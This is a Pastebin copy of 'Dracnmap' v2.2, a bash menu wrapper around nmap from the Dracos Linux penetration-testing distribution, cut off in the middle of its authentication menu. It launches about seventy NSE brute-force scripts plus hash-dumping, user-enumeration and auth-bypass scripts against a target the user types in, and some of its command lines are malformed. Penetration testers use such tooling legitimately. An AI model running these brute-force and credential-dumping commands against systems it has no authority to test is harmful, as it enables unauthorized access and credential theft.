Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env bash
- #============================================================================================================
- # Dracnmap for dracos
- #
- # Welcome and dont disclaimer
- # Dracnmap Author By Edo -maland- a.k.a screetsec
- # Tested On Kali Linux and Dracos
- # contact me in screetsec@gmail.com or screetsec@dracos-linux.org
- # OS Penetration From Indonesia : https://dracos-linux.org/
- #============================================================================================================
- #This colour
- cyan='\e[0;36m'
- green='\e[0;34m'
- okegreen='\033[92m'
- lightgreen='\e[1;32m'
- white='\e[1;37m'
- red='\e[1;31m'
- yellow='\e[1;33m'
- BlueF='\e[1;34m'
- #Variable
- Version='2.2'
- Codename='Redline'
- xterm='xterm -hold -fa monaco -fs 13 -bg black -e nmap'
- urxvt='urxvt -hold -e nmap'
- output=`pwd`
- trap ctrl_c INT
- ctrl_c() {
- clear
- echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..."
- sleep 1
- echo ""
- echo -e $yellow"[*] Thank You For Using Dracnmap =)."
- echo ""
- echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
- exit
- }
- #Bebeku
- if [[ $EUID -ne 0 ]]; then
- echo "ERROR! Run this script with root user!"
- exit 1
- fi
- if [ -z "${DISPLAY:-}" ]; then
- echo -e "\e[1;31mThe script should be executed inside a X (graphical) session."$transparent""
- exit 1
- fi
- resize -s 50 84 > /dev/null
- ###############################################
- # Checking gaannss
- ###############################################
- clear
- echo -e $okegreen ""
- echo -e $okegreen " .___ _______ $red ________ ";
- echo -e $okegreen " __| _/___________ ____ \ \ _____ _____ ______ $red ___ _\_____ \ ";
- echo -e $okegreen " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ $red \ \/ // ____/ ";
- echo -e $okegreen "/ /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >$red \ // \ ";
- echo -e $okegreen "\____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ $red/\ \_/ \_______ \ ";
- echo -e $okegreen " \/ \/ \/ \/ \/ \/|__| $red\/ \/ ";
- echo
- echo -e $okegreen"-------------------------------------------------------------------------------"
- echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Pentester Indonesia '
- echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- '
- echo -e " "
- if [ $(id -u) != "0" ]; then
- echo [!]::[Check Dependencies] ;
- sleep 2
- echo [✔]::[Check User]: $USER ;
- sleep 1
- echo [x]::[not root]: you need to be [root] to run this script.;
- echo ""
- sleep 1
- exit
- else
- echo [!]::[Check Dependencies]: ;
- sleep 1
- echo [✔]::[Check User]: $USER ;
- fi
- ping -c 1 google.com > /dev/null 2>&1
- if [ "$?" != 0 ]
- then
- echo [✔]::[Internet Connection]: DONE!;
- echo [x]::[warning]: This Script Needs An Active Internet Connection;
- sleep 2
- else
- echo [✔]::[Internet Connection]: connected!;
- sleep 2
- fi
- # check nmap if exists
- which nmap > /dev/null 2>&1
- if [ "$?" -eq "0" ]; then
- echo [✔]::[nmap]: installation found!;
- else
- echo [x]::[warning]:this script require Nmap ;
- echo ""
- echo [!]::[please wait]: please install .... ;
- apt-get update
- apt-get install nmap
- echo ""
- sleep 2
- exit
- fi
- sleep 2
- # check urxvt if exists
- which xterm > /dev/null 2>&1
- if [ "$?" -eq "0" ]; then
- echo [✔]::[xterm]: installation found!;
- else
- echo [x]::[warning]:this script require xterm ;
- echo ""
- echo [!]::[please wait]: please install .... ;
- apt-get update
- apt-get install xterm
- echo ""
- sleep 2
- exit
- fi
- sleep 2
- ################################################
- # OUTPUT FILE
- ################################################
- function scanoutput() {
- echo -e $cyan " "
- clear
- echo " "
- echo " "
- echo -e $okegreen" /^--^\ /^--^\ /^--^\ $cyan"
- echo -e $okegreen" \____/ \____/ \____/ $cyan "
- echo -e $okegreen" / \ / \ / \ $cyan"
- echo -e $okegreen" | | | | | | $cyan "
- echo -e $okegreen" \__ __/ \__ __/ \__ __/ $cyan MEONG MOEONG "
- echo " |^|^|^|^|^|^|^|^|^|^|^|^\ \^|^|^|^/ /^|^|^|^|^\ \^|^|^|^|^|^|^|^|^|^|^|^| "
- echo " | | | | | | | | | | | | |\ \| | |/ /| | | | | | \ \ | | | | | | | | | | | "
- echo " ########################/ /######\ \###########/ /####################### "
- echo " | | | | | | | | | | | | \/| | | | \/| | | | | |\/ | | | | | | | | | | | | "
- echo " |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| "
- echo -e $white " "
- echo -e $white" [$okegreen"01"$white]$okegreen OUTPUT SCAN IN XML FORMATS "
- echo -e $white" [$okegreen"02"$white]$okegreen OUTPUT SCAN IN HTML FORMATS "
- echo -e $white" [$okegreen"03"$white]$okegreen OUTPUT SCAN IN NORMAL FORMATS "
- echo -e $white" [$okegreen"04"$white]$okegreen OUTPUT SCAN IN GREPABLE FORMATS "
- echo -e $white" [$okegreen"05"$white]$okegreen BACK "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@Meoong:\033[0m>> '; tput sgr0 #insert your choice
- read DrS
- if test $DrS == '1'
- then
- echo
- echo -ne $cyan" Path Location: $HOME/"
- echo
- echo -ne " Name of Report:"
- read namafile
- echo
- echo -ne " What is your IP Target or Host: "
- read ip
- echo
- $urxvt -A -O -oX $HOME/$namafile.xml $ip &
- firefox $HOME/$namafile.xml
- elif test $DrS == '2'
- then
- echo
- echo -ne $cyan" Path Location: $HOME/"
- echo
- echo -ne " Name of Report:"
- read namafile
- echo
- echo -ne " What is your IP Target or Host: "
- read ip
- echo
- $urxvt -A -O -oX $HOME/$namafile.xml $ip &
- xsltproc $HOME/$namafile.xml -o $HOME/$namafile.html
- firefox $HOME/$namafile.html
- elif test $DrS == '3'
- then
- echo
- echo -ne $cyan" Path Location: $HOME/"
- echo
- echo -ne " Name of Report:"
- read namafile
- echo
- echo -ne " What is your IP Target or Host: "
- read ip
- echo
- $urxvt -F -oN $HOME/$namafile.txt $ip &
- nano $HOME/$namafile.txt
- elif test $DrS == '4'
- then
- echo
- echo -ne $cyan" Path Location: $HOME/"
- echo
- echo -ne " Name of Report:"
- read namafile
- echo
- echo -ne " What is your IP Target or Host: "
- read ip
- echo
- $urxvt -F -oG $HOME/$namafile.grep $ip &
- nano $HOME/$namafile.grep
- elif test $DrS == '5'
- then
- menu
- else
- echo -e " Incorrect Number"
- fi
- echo -n -e " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- scanoutput
- fi
- }
- ################################################
- # NSE SCRIPT FOR BRUTEFORCE
- ################################################
- function brutense () {
- clear
- echo " ";
- echo -e $white " "
- echo -e $white" [$okegreen"01"$white]$cyan afp-brute "
- echo -e $white" [$okegreen"02"$white]$cyan ajp-brute "
- echo -e $white" [$okegreen"03"$white]$cyan backorifice-brute "
- echo -e $white" [$okegreen"04"$white]$cyan cassandra-brute "
- echo -e $white" [$okegreen"05"$white]$cyan cics-enum "
- echo -e $white" [$okegreen"06"$white]$cyan cics-user-enum "
- echo -e $white" [$okegreen"07"$white]$cyan citrix-brute-xml"
- echo -e $white" [$okegreen"08"$white]$cyan cvs-brute "
- echo -e $white" [$okegreen"09"$white]$cyan cvs-brute-repository "
- echo -e $white" [$okegreen"10"$white]$cyan domcon-brute "
- echo -e $white" [$okegreen"11"$white]$cyan dpap-enum "
- echo -e $white" [$okegreen"12"$white]$cyan drda-brute "
- echo -e $white" [$okegreen"13"$white]$cyan ftp-brute "
- echo -e $white" [$okegreen"14"$white]$cyan http-from-brute "
- echo -e $white" [$okegreen"15"$white]$cyan http-iis-short-name-brute "
- echo -e $white" [$okegreen"16"$white]$cyan http-brute "
- echo -e $white" [$okegreen"17"$white]$cyan http-joomla-brute "
- echo -e $white" [$okegreen"18"$white]$cyan http-proxy-brute "
- echo -e $white" [$okegreen"19"$white]$cyan http-wordpress-brute "
- echo -e $white" [$okegreen"20"$white]$cyan iax2-brute "
- echo -e $white" [$okegreen"21"$white]$cyan informix-brute "
- echo -e $white" [$okegreen"22"$white]$cyan ipmi-brute "
- echo -e $white" [$okegreen"23"$white]$cyan irc-brute "
- echo -e $white" [$okegreen"24"$white]$cyan irc-sasl-brute "
- echo -e $white" [$okegreen"25"$white]$cyan iscsi-brute "
- echo -e $white" [$okegreen"26"$white]$cyan ldap-brute "
- echo -e $white" [$okegreen"27"$white]$cyan imap-brute "
- echo -e $white" [$okegreen"28"$white]$cyan membase-brute "
- echo -e $white" [$okegreen"29"$white]$cyan mmouse-brute "
- echo -e $white" [$okegreen"30"$white]$cyan mongodb-brute "
- echo -e $white" [$okegreen"31"$white]$cyan ms-sql-brute "
- echo -e $white" [$okegreen"32"$white]$cyan mysql-brute "
- echo -e $white" [$okegreen"33"$white]$cyan mysql-enum "
- echo -e $white" [$okegreen"34"$white]$cyan mongodb-brute"
- echo -e $white" [$okegreen"35"$white]$cyan metasploit-msgrpc-brute "
- echo -e $white" [$okegreen"36"$white]$cyan metasploit-xmlrpc-brute "
- echo -e $white" [$okegreen"37"$white]$cyan mikrotik-routeros-brute "
- echo -e $white" [$okegreen"38"$white]$cyan nessus-xmlrpc-brute "
- echo -e $white" [$okegreen"39"$white]$cyan netbus-brute "
- echo -e $white" [$okegreen"40"$white]$cyan nexpose-brute "
- echo -e $white" [$okegreen"41"$white]$cyan nje-node-brute "
- echo -e $white" [$okegreen"42"$white]$cyan nje-pass-brute "
- echo -e $white" [$okegreen"43"$white]$cyan nping-brute "
- echo -e $white" [$okegreen"44"$white]$cyan nessus-brute "
- echo -e $white" [$okegreen"45"$white]$cyan omp2-brute "
- echo -e $white" [$okegreen"46"$white]$cyan openvas-otp-brute "
- echo -e $white" [$okegreen"47"$white]$cyan oracle-brute "
- echo -e $white" [$okegreen"48"$white]$cyan oracle-brute-stealth "
- echo -e $white" [$okegreen"49"$white]$cyan oracle-sid-brute "
- echo -e $white" [$okegreen"50"$white]$cyan pcanywhere-brute "
- echo -e $white" [$okegreen"51"$white]$cyan pgsql-brute "
- echo -e $white" [$okegreen"52"$white]$cyan pop3-brute "
- echo -e $white" [$okegreen"53"$white]$cyan redis-brute "
- echo -e $white" [$okegreen"54"$white]$cyan rexec-brute "
- echo -e $white" [$okegreen"55"$white]$cyan rlogin-brute "
- echo -e $white" [$okegreen"56"$white]$cyan rpcap-brute "
- echo -e $white" [$okegreen"57"$white]$cyan rsync-brute "
- echo -e $white" [$okegreen"58"$white]$cyan rtsp-url-brute "
- echo -e $white" [$okegreen"59"$white]$cyan sip-brute "
- echo -e $white" [$okegreen"60"$white]$cyan socks-brute "
- echo -e $white" [$okegreen"61"$white]$cyan svn-brute "
- echo -e $white" [$okegreen"62"$white]$cyan tso-enum "
- echo -e $white" [$okegreen"63"$white]$cyan smb-brute "
- echo -e $white" [$okegreen"64"$white]$cyan smtp-brute "
- echo -e $white" [$okegreen"65"$white]$cyan snmp-brute "
- echo -e $white" [$okegreen"66"$white]$cyan telnet-brute "
- echo -e $white" [$okegreen"67"$white]$cyan vtam-enum "
- echo -e $white" [$okegreen"68"$white]$cyan vmauthd-brute "
- echo -e $white" [$okegreen"69"$white]$cyan vnc-brute"
- echo -e $white" [$okegreen"70"$white]$cyan xmpp-brute "
- echo -e $white" [$okegreen"71"$white]$cyan Back "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@nse-brute:\033[0m>> '; tput sgr0 #insert your choice
- read Brute
- if test $Brute == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
- read port
- $urxvt -p $port --script afp-brute $ip &
- elif test $Brute == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
- read port
- $urxvt -p $port $ip --script ajp-brute &
- elif test $Brute == '3'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
- read port
- $urxvt -sU --script backorifice-brute $ip --script-args backorifice-brute.ports=$port &
- elif test $Brute == '4'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 9160 $ip --script=cassandra-brute &
- elif test $Brute == '5'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=cics-enum -p 23 $ip &
- elif test $Brute == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=cics-user-enum -p 23 $ip &
- elif test $Brute == '7'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What Userdb " ; tput sgr0
- read userdb
- echo -ne $okegreen " What Passdb " ; tput sgr0
- read passdb
- echo -ne $okegreen " What domain " ; tput sgr0
- read domain
- $urxvt --script=citrix-brute-xml --script-args=userdb=$userdb,passdb=$passdb,ntdomain=$domain -p 80,443,8080 $ip &
- elif test $Brute == '8'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 2401 --script cvs-brute $ip &
- elif test $Brute == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 2401 --script cvs-brute-repository $ip &
- elif test $Brute == '10'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script domcon-brute -p 2050 $ip &
- elif test $Brute == '11'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script dpap-brute -p 8770 $ip &
- elif test $Brute == '12'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 50000 --script drda-brute $ip &
- elif test $Brute == '13'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
- read port
- $urxvt --script ftp-brute -p $port $ip &
- elif test $Brute == '14'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-form-brute -p 80 $ip &
- elif test $Brute == '15'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-iis-short-name-brute $ip &
- elif test $Brute == '16'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
- read port
- $urxvt --script http-brute -p $port $ip &
- elif test $Brute == '17'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-joomla-brute $ip &
- elif test $Brute == '18'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-proxy-brute -p 8080 $ip &
- elif test $Brute == '19'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-wordpress-brute $ip &
- elif test $Brute == '20'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU -p 4569 $ip --script iax2-brute &
- elif test $Brute == '21'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script informix-brute -p 9088 $ip &
- elif test $Brute == '22'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script ipmi-brute -p 623 $ip &
- elif test $Brute == '23'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script irc-brute -p 6667 $ip &
- elif test $Brute == '24'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script irc-sasl-brute -p 6667 $ip &
- elif test $Brute == '25'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=iscsi-brute $ip &
- elif test $Brute == '26'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' $ip &
- elif test $Brute == '27'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 143,993 --script imap-brute $ip &
- elif test $Brute == '28'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 11211 --script membase-brute &
- elif test $Brute == '29'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script mmouse-brute -p 51010 $ip &
- elif test $Brute == '30'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 27017 $ip --script mongodb-brute &
- elif test $Brute == '31'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt $ip &
- elif test $Brute == '32'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=mysql-brute $ip
- elif test $Brute == '33'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- nmap --script=mysql-enum $ip &
- elif test $Brute == '34'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 27017 $ip --script mongodb-brute &
- elif test $Brute == '35'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script metasploit-msgrpc-brute -p 55553 $ip &
- elif test $Brute == '36'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script metasploit-xmlrpc-brute -p 55553 $ip &
- elif test $Brute == '37'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 8728 --script mikrotik-routeros-brute $ip &
- elif test $Brute == '38'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=nessus-xmlrpc-brute $ip &
- elif test $Brute == '39'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 12345 --script netbus-brute $ip &
- elif test $Brute == '40'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script nexpose-brute -p 3780 $ip &
- elif test $Brute == '41'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=nje-node-brute $ip &
- elif test $Brute == '42'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS',sleep=5 -p 175 $ip &
- elif test $Brute == '43'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 9929 --script nping-brute $ip &
- elif test $Brute == '44'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script nessus-brute -p 1241 $ip &
- elif test $Brute == '45'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 9390 --script omp2-brute $ip &
- elif test $Brute == '46'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=openvas-otp-brute $ip &
- elif test $Brute == '47'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL $ip &
- elif test $Brute == '48'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL $ip &
- elif test $Brute == '49'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=oracle-sid-brute -p 1521-1560 $ip &
- elif test $Brute == '50'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=pcanywhere-brute $ip &
- elif test $Brute == '51'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 5432 --script pgsql-brute $ip &
- elif test $Brute == '52'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=pop3-brute $ip &
- elif test $Brute == '53'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 6379 $ip --script redis-brute &
- elif test $Brute == '54'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 512 --script rexec-brute $ip &
- elif test $Brute == '55'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 513 --script rlogin-brute $ip &
- elif test $Brute == '56'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 2002 $ip --script rpcap-brute &
- elif test $Brute == '57'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' $ip &
- elif test $Brute == '58'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script rtsp-url-brute -p 554 $ip &
- elif test $Brute == '59'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU -p 5060 $ip --script=sip-brute &
- elif test $Brute == '60'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script socks-brute -p 1080 $ip &
- elif test $Brute == '61'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 $ip &
- elif test $Brute == '62'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=tso-enum -p 23 $ip &
- elif test $Brute == '63'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU -sS --script smb-brute.nse -p U:137,T:139 &
- elif test $Brute == '64'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 25 --script smtp-brute $ip &
- elif test $Brute == '65'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Located Wordlist ? : " ; tput sgr0
- read wordlist
- $urxvt -sU --script snmp-brute $ip [--script-args snmp-brute.communitiesdb=$wordlist ] &
- elif test $Brute == '66'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " Open Port on Target or Host (23): " ; tput sgr0
- read port
- $urxvt -p $port --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s $ip &
- elif test $Brute == '67'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script vtam-enum -p 23 $ip &
- elif test $Brute == '68'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 902 $ip --script vmauthd-brute &
- elif test $Brute == '69'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script vnc-brute -p 5900 $ip &
- elif test $Brute == '70'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 5222 --script xmpp-brute $ip &
- elif test $Brute == '71'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- brutense
- fi
- }
- function auth () {
- clear
- echo
- echo
- echo -e $white" [$okegreen"01"$white]$cyan ajp-auth "
- echo -e $white" [$okegreen"02"$white]$cyan creds-summary "
- echo -e $white" [$okegreen"03"$white]$cyan domcon-cmd "
- echo -e $white" [$okegreen"04"$white]$cyan domino-enum-users "
- echo -e $white" [$okegreen"05"$white]$cyan ftp-anon "
- echo -e $white" [$okegreen"06"$white]$cyan http-auth "
- echo -e $white" [$okegreen"07"$white]$cyan http-barracuda-dir-traversal "
- echo -e $white" [$okegreen"08"$white]$cyan http-config-backup "
- echo -e $white" [$okegreen"09"$white]$cyan http-default-accounts "
- echo -e $white" [$okegreen"10"$white]$cyan http-domino-enum-passwords "
- echo -e $white" [$okegreen"11"$white]$cyan http-method-tamper "
- echo -e $white" [$okegreen"12"$white]$cyan http-userdir-enum "
- echo -e $white" [$okegreen"13"$white]$cyan http-vuln-cve2010-0738 "
- echo -e $white" [$okegreen"14"$white]$cyan http-wordpress-users "
- echo -e $white" [$okegreen"15"$white]$cyan informix-query "
- echo -e $white" [$okegreen"16"$white]$cyan informix-tables "
- echo -e $white" [$okegreen"17"$white]$cyan krb5-enum-users "
- echo -e $white" [$okegreen"18"$white]$cyan ms-sql-dump-hashes"
- echo -e $white" [$okegreen"19"$white]$cyan ms-sql-empty-password "
- echo -e $white" [$okegreen"20"$white]$cyan ms-sql-hasdbaccess "
- echo -e $white" [$okegreen"21"$white]$cyan mysql-dump-hashes "
- echo -e $white" [$okegreen"22"$white]$cyan mysql-empty-password "
- echo -e $white" [$okegreen"23"$white]$cyan mysql-query "
- echo -e $white" [$okegreen"24"$white]$cyan mysql-users "
- echo -e $white" [$okegreen"25"$white]$cyan ncp-enum-users "
- echo -e $white" [$okegreen"26"$white]$cyan netbus-auth-bypass "
- echo -e $white" [$okegreen"27"$white]$cyan oracle-enum-users "
- echo -e $white" [$okegreen"28"$white]$cyan realvnc-auth-bypass "
- echo -e $white" [$okegreen"29"$white]$cyan sip-enum-users "
- echo -e $white" [$okegreen"30"$white]$cyan smb-enum-users "
- echo -e $white" [$okegreen"31"$white]$cyan smtp-enum-users "
- echo -e $white" [$okegreen"32"$white]$cyan snmp-win32-users "
- echo -e $white" [$okegreen"33"$white]$cyan x11-access "
- echo -e $white" [$okegreen"34"$white]$cyan Back "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@nse-auth:\033[0m>> '; tput sgr0 #insert your choice
- read win
- if test $win == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 8009 $ip --script ajp-auth [--script-args ajp-auth.path=/login] &
- elif test $win == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -sC $ip &
- elif test $win == '3'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your cmd user: " ; tput sgr0
- read user
- echo -ne $okegreen " What is your cmd pass: " ; tput sgr0
- read pass
- $urxvt -p 2050 $ip --script domcon-cmd --script-args domcon-cmd.cmd="show server" domcon-cmd.user="$user",domcon-cmd.pass="$pass" &
- elif test $win == '4'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script domino-enum-users -p 1352 $ip &
- elif test $win == '5'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -sC $ip &
- elif test $win == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-auth [--script-args http-auth.path=/login] -p80 $ip &
- elif test $win == '7'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target " ; tput sgr0
- read port
- $urxvt --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p $port $ip &
- elif test $win == '8'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=http-config-backup $ip &
- elif test $win == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-default-accounts $ip &
- elif test $win == '10'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What the username: " ; tput sgr0
- read user
- echo -ne $okegreen " What the password: " ; tput sgr0
- read pass
- $urxvt --script domino-enum-passwords -p 80 $ip --script-args domino-enum-passwords.username=$user,domino-enum-passwords.password=$pass &
- elif test $win == '11'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
